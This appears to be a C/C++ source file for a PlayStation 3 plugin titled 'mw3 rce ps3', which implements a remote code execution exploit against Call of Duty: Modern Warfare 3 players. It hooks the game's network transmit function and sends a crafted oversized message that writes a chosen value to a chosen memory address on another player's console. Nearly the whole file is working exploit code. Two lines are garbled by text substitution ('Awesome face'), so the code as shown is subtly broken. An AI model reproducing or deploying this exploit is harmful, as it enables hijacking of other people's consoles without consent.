mw3 rce ps3

1. #include <cellstatus.h>
2.  
3. #include <sys/prx.h>
4.  
5. #include <time.h>
6.  
7. #include <fastmath.h>
8.  
9. #include <ppu_intrinsics.h>
10.  
11. #include <stdarg.h>
12.  
13. #include <stddef.h>
14.  
15.  
16.  
17. #include <sys/prx.h>
18.  
19. #include <sys/syscall.h>
20.  
21. #include <sys/ppu_thread.h>
22.  
23. #include <sys/sys_time.h>
24.  
25. #include <sys/time_util.h>
26.  
27. #include <sys/timer.h>
28.  
29. #include <sys/types.h>
30.  
31.  
32.  
33. #include <sys/socket.h>
34.  
35. #include <netinet\in.h>
36.  
37. #include <arpa\inet.h>
38.  
39. #include <netdb.h>
40.  
41. #include <cell\pad\libpad.h>
42.  
43. #include <sys/process.h>
44.  
45. #include <sys/memory.h>
46.  
47.  
48.  
49. SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
50.  
51. SYS_MODULE_START( _MW3_RCE_prx_entry );
52.  
53. SYS_MODULE_STOP(_MW3_RCE_prx_stop);
54.  
55.  
56.  
57. /*
58.  
59. Credits:
60.  
61. Gamer7112 for bring my attention to this
62.  
63. momo5502 for originally making a post showing this off.
64.  
65. Sabotage finding the exploit and creating the poc
66.  
67. */
68.  
69.  
70.  
71. int RestoreHook[4];
72.  
73.  
74.  
75.  
76.  
77. extern "C" {
78.  
79.     void *_sys_memset(void * ptr, void* value, size_t num);
80.  
81. }
82.  
83.  
84.  
85. #define memset          _sys_memset
86.  
87.  
88.  
89. struct msg_t
90.  
91. {
92.  
93.     int overflowed;
94.  
95.     int readOnly;
96.  
97.     char* data;
98.  
99.     char* splitData;
100.  
101.     int maxsize;
102.  
103.     int cursize;
104.  
105.     int splitSize;
106.  
107.     int readcount;
108.  
109.     int bit;
110.  
111.     int lastEntityRef;
112.  
113.     int targetLocalNetID;
114.  
115.     int useZlib;
116.  
117. };
118.  
119.  
120.  
121. #define TOC 0x72DCE8
122.  
123.  
124.  
125. struct opd_s_o
126.  
127. {
128.  
129.     unsigned int sub;
130.  
131.     unsigned int toc;
132.  
133. };
134.  
135.  
136.  
137. opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
138.  
139. int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
140.  
141.  
142.  
143. opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
144.  
145. int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
146.  
147.  
148.  
149. opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
150.  
151. int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
152.  
153.  
154.  
155. int CL_Netchan_TransmitStub(...)
156.  
157. {
158.  
159.     __asm("li %r3, 0x332;");
160.  
161. }
162.  
163.  
164.  
165.  
166.  
167.  
168.  
169. int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
170.  
171. {
172.  
173.     if (*(int*)0x10055000 == 2)
174.  
175.     {
176.  
177.         msg_t message;
178.  
179.         memset(&message, 0, sizeof(msg_t));
180.  
181.  
182.  
183.         char MessageBuffer[0x1000];
184.  
185.         char DataToBeSent[0x1000];
186.  
187.         memset(MessageBuffer, 0, 0x1000);
188.  
189.         memset(DataToBeSent, 0, 0x1000);
190.  
191.  
192.  
193.         MSG_Init(&message, MessageBuffer, 0x1000);
194.  
195.         MSG_WriteData(&message, buffer, 0x9);
196.  
197.  
198.  
199.         memset(DataToBeSent, 0, 0x840 + 0x9C);
200.  
201.  
202.  
203.         int* a = (int*)&Awesome faceataToBeSent[0x808];
204.  
205.  
206.  
207.         a[1] = *(int*)(0x10055014); //value
208.  
209.         a[3] = *(int*)(0x10055010); //address
210.  
211.  
212.  
213.         int* r = (int*)&Awesome faceataToBeSent[0x820];
214.  
215.  
216.  
217.         r[3] = 0xCAD8C;
218.  
219.  
220.  
221.         r[35] = 0x1F6E58;
222.  
223.         r[36] = 0xAAAAAAAA;
224.  
225.  
226.  
227.         MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
228.  
229.  
230.  
231.         int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
232.  
233.  
234.  
235.         *(int*)0x10055000 = 0;
236.  
237.  
238.  
239.         return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
240.  
241.     }
242.  
243.  
244.  
245.     return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
246.  
247.  
248.  
249. }
250.  
251.  
252.  
253.  
254.  
255.  
256.  
257. int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
258.  
259.     system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
260.  
261.     return_to_user_prog(int);
262.  
263. }
264.  
265.  
266.  
267. int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
268.  
269.     system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
270.  
271.     __dcbst((void*)address);
272.  
273.     __sync();
274.  
275.     __isync();
276.  
277.     return_to_user_prog(int32_t);
278.  
279. }
280.  
281.  
282.  
283. void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
284.  
285.     int StubData[8], FuncData[4];
286.  
287.  
288.  
289.     int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
290.  
291.     int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
292.  
293.  
294.  
295.     if (stub_address) {
296.  
297.         int branchAddr = address + 0x10;
298.  
299.         StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
300.  
301.         StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
302.  
303.         StubData[2] = 0x7D6903A6;
304.  
305.         StubData[7] = 0x4E800420;
306.  
307.         sys_dbg_read_process_memory(address, &StubData[3], 0x10);
308.  
309.         sys_dbg_write_process_memory(stub_address, StubData, 0x20);
310.  
311.     }
312.  
313.  
314.  
315.     if (hook_address) {
316.  
317.         FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
318.  
319.         FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
320.  
321.         FuncData[2] = 0x7D6903A6;
322.  
323.         FuncData[3] = 0x4E800420;
324.  
325.         sys_dbg_write_process_memory(address, FuncData, 0x10);
326.  
327.     }
328.  
329. }
330.  
331.  
332.  
333.  
334.  
335.  
336.  
337. extern "C" int _MW3_RCE_prx_entry(void)
338.  
339. {
340.  
341.     sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);
342.  
343.  
344.  
345.     DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);
346.  
347.  
348.  
349.     return SYS_PRX_RESIDENT;
350.  
351. }
352.  
353.  
354.  
355.  
356.  
357. extern "C" int _MW3_RCE_prx_stop(void)
358.  
359. {
360.  
361.     sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);
362.  
363.  
364.  
365.  
366.  
367.     return SYS_PRX_RESIDENT;
368.  
369. }